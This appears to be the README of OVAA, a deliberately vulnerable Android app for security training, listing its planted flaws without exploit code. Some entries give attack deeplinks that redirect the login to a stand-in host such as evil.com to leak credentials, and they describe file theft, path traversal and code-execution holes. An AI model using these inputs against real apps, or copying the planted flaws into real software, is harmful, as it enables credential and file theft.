OVAA (Oversecured Vulnerable Android App) is an Android app that aggregates all the platform's known and popular security vulnerabilities.
This section only includes the list of vulnerabilities, without a detailed description or proof of concept. Examples from OVAA will receive detailed examination and analysis on our blog.
- Installation of an arbitrary
login_url
via deeplinkoversecured://ovaa/login?url=http://evil.com/
. Leads to the user's user name and password being leaked when they log in. - Obtaining access to arbitrary content providers (not exported, but with the attribute
android:grantUriPermissions="true"
) via deeplinkoversecured://ovaa/grant_uri_permissions
. The attacker's app needs to processoversecured.ovaa.action.GRANT_PERMISSIONS
and pass intent tosetResult(code, intent)
with flags such asIntent.FLAG_GRANT_READ_URI_PERMISSION
and the URI of the content provider. - Vulnerable host validation when processing deeplink
oversecured://ovaa/webview?url=...
. - Opening arbitrary URLs via deeplink
oversecured://ovaa/webview?url=http://evilexample.com
. An attacker can use the vulnerable WebView settingWebSettings.setAllowFileAccessFromFileURLs(true)
in theWebViewActivity.java
file to steal arbitrary files by sending them XHR requests and obtaining their content. - Access to arbitrary activities and acquiring access to arbitrary content providers in
LoginActivity
by supplying an arbitrary Intent object toredirect_intent
. - Theft of arbitrary files in
MainActivity
by intercepting an activity launch fromIntent.ACTION_PICK
and passing the URI to any file as data. - Insecure broadcast to
MainActivity
containing credentials. The attacker can register a broadcast receiver with actionoversecured.ovaa.action.UNPROTECTED_CREDENTIALS_DATA
and obtain the user's data. - Insecure activity launch in
MainActivity
with actionoversecured.ovaa.action.WEBVIEW
, containing the user's encrypted data in the query parametertoken
. - Deletion of arbitrary files via the insecure
DeleteFilesSerializable
deserialization object. - Memory corruption via the
MemoryCorruptionParcelable
object. - Memory corruption via the
MemoryCorruptionSerializable
object. - Obtaining read/write access to arbitrary files in
TheftOverwriteProvider
via path-traversal in the valueuri.getLastPathSegment()
. - Obtaining access to app logs via
InsecureLoggerService
. Leak of credentials inLoginActivity
Log.d("ovaa", "Processing " loginData)
. - Use of the hardcoded AES key in
WeakCrypto
. - Arbitrary Code Execution in
OversecuredApplication
by launching code from third-party apps with no security checks. - Use of very wide file sharing declaration for
oversecured.ovaa.fileprovider
content provider inroot
entry. - Hardcoded credentials to a dev environment endpoint in
strings.xml
intest_url
entry. - Arbitrary code execution via a DEX library located in a world-readable/writable directory.
Licensed under the Simplified BSD License
Copyright (c) 2020, Oversecured Inc